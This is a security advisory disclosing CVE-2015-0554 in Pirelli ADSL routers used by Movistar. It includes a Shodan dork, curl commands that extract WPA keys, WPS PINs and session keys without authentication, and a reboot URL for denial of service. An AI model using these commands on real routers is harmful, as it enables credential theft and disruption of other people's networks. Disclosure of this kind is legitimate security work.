Pirelli ADSL2/2+ Wireless Router P.DGA4001N Information Disclosure

`- Title:  
  
CVE-2015-0554 ADB BroadBand Pirelli ADSL2/2+ Wireless Router P.DGA4001N remote information disclosure   
HomeStation Movistar  
  
- Author:  
  
Eduardo Novella @enovella_  
ednolo[@]inf.upv[dot]es  
  
- Version:  
  
Tested on firmware version PDG_TEF_SP_4.06L.6  
  
  
- Shodan dork :   
+ "Dropbear 0.46 country:es" ( From now on it looks like not working on this way)  
  
  
- Summary:  
  
HomeStation movistar has deployed routers manufactured by Pirelli. These routers are vulnerable to fetch HTML code from any   
IP public over the world. Neither authentication nor any protection to avoid unauthorized extraction of sensitive information.  
  
  
- The vulnerability and the way to exploit it:  
  
  
$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "WLAN_"  
<option value='0'>WLAN_DEAD</option>  
  
$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "var wpapskkey"  
var wpaPskKey = 'IsAklFHhFFui1sr9ZMqD';  
  
$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "var WscDevPin"  
var WscDevPin = '12820078';  
  
$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "var sessionkey"  
var sessionKey='1189641421';  
  
$ curl -s http://${IP_ADDRESS}/wlcfg.html | grep -i "bssid:" -A 3  
<td width="50">BSSID:</td>  
<td>  
DC:0B:1A:XX:XX:XX  
</td>  
  
  
  
# Rebooting the router remotely and provoking a Denial of Service  
#-----------------------------------------------------------------  
http://${IP_ADDRESS}/resetrouter.html  
  
We can observe at the source:  
<!-- hide  
  
var sessionKey='846930886';  
function btnReset() {  
var loc = 'rebootinfo.cgi?';  
  
loc += 'sessionKey=' + sessionKey;  
  
var code = 'location="' + loc + '"';  
eval(code);  
}  
  
// done hiding -->  
  
  
http://${IP_ADDRESS}/rebootinfo.cgi?sessionKey=233665123  
  
  
# All the information what we can fetch from.  
#----------------------------------------------  
webs$ ls  
adslcfgadv.html diagpppoe.html ipv6lancfg.html qoscls.html statsatmreset.html  
adslcfgc.html dlnacfg.html js qosqmgmt.html statsifc.html  
adslcfg.html dnscfg.html jsps qosqueueadd.html statsifcreset.html  
adslcfgtone.html dnsproxycfg.html lancfg2.html qsmain.html statsmocalanreset.html  
algcfg.html dsladderr.html languages quicksetuperr.html statsmocareset.html  
APIS dslbondingcfg.html lockerror.html quicksetup.html statsmocawanreset.html  
atmdelerr.html enblbridge.html logconfig.html quicksetuptesterr.html statsvdsl.html  
backupsettings.html enblservice.html logintro.html quicksetuptestsucc.html statsvdslreset.html  
berrun.html engdebug.html logobkg.gif rebootinfo.html statswanreset.html  
berstart.html ethadderr.html logoc.gif resetrouter.html statsxtmreset.html  
berstop.html ethdelerr.html logo_corp.gif restoreinfo.html storageusraccadd.html  
certadd.html footer.html logo.html routeadd.html stylemain.css  
certcaimport.html hlpadslsync.html logomenu.gif rtdefaultcfgerr.html threeGPIN.html  
certimport.html hlpatmetoe.html main.html rtdefaultcfg.html todadd.html  
certloadsigned.html hlpatmseg.html menuBcm.js scdmz.html tr69cfg.html  
cfgatm.html hlpethconn.html menu.html scinflt.html updatesettings.html  
cfgeth.html hlppngdns.html menuTitle.js scmacflt.html upload.html  
cfgl2tpac.html hlppnggw.html menuTree.js scmacpolicy.html uploadinfo.html  
cfgmoca.html hlppppoasess.html mocacfg.html scoutflt.html upnpcfg.html  
cfgptm.html hlppppoeauth.html multicast.html scprttrg.html url_add.html  
colors.css hlppppoeconn.html natcfg2.html scripts util.js  
config.json.txt hlppppoeip.html ntwksum2.html scvrtsrv.html wanadderr.html  
css hlptstdns.html omcidownload.html seclogintro.html wancfg.html  
ddnsadd.html hlpusbconn.html omcisystem.html snmpconfig.html wlcfgadv.html  
defaultsettings.html hlpwlconn.html password.html sntpcfg.html wlcfg.html  
dhcpinfo.html html portmapadd.html standby.html wlcfgkey.html  
diag8021ag.html ifcdns.html portmapedit.html StaticIpAdd.html wlmacflt.html  
diagbr.html ifcgateway.html portName.js StaticIpErr.html wlrefresh.html  
diag.html images pppoe.html statsadslerr.html wlsecurity.html  
diagipow.html index.html pradd.html statsadsl.html wlsetup.html  
diaglan.html info.html ptmadderr.html statsadslreset.html wlwapias.html  
diagmer.html ipoacfg.html ptmdelerr.html statsatmerr.html xdslcfg.html  
diagpppoa.html ippcfg.html pwrmngt.html statsatm.html  
  
  
  
+ Conclusion:  
  
This vulnerability can be exploited remotely and it should be patched as soon as possible. An attacker could be monitoring our network  
or even worse being a member of a botnet without knowledge of it.   
First mitigation could be either try to update the last version for these routers or install 3rd parties firmwares as OpenWRT or DDWRT on them.  
  
  
  
+ References:  
  
http://packetstormsecurity.com/files/115663/Alpha-Networks-ADSL2-2-Wireless-Router-ASL-26555-Password-Disclosure.html  
  
  
  
+ Timeline:  
  
2013-04-xx Send email to Movistar and Pirelli  
2015-01-05 Full disclosure   
  
`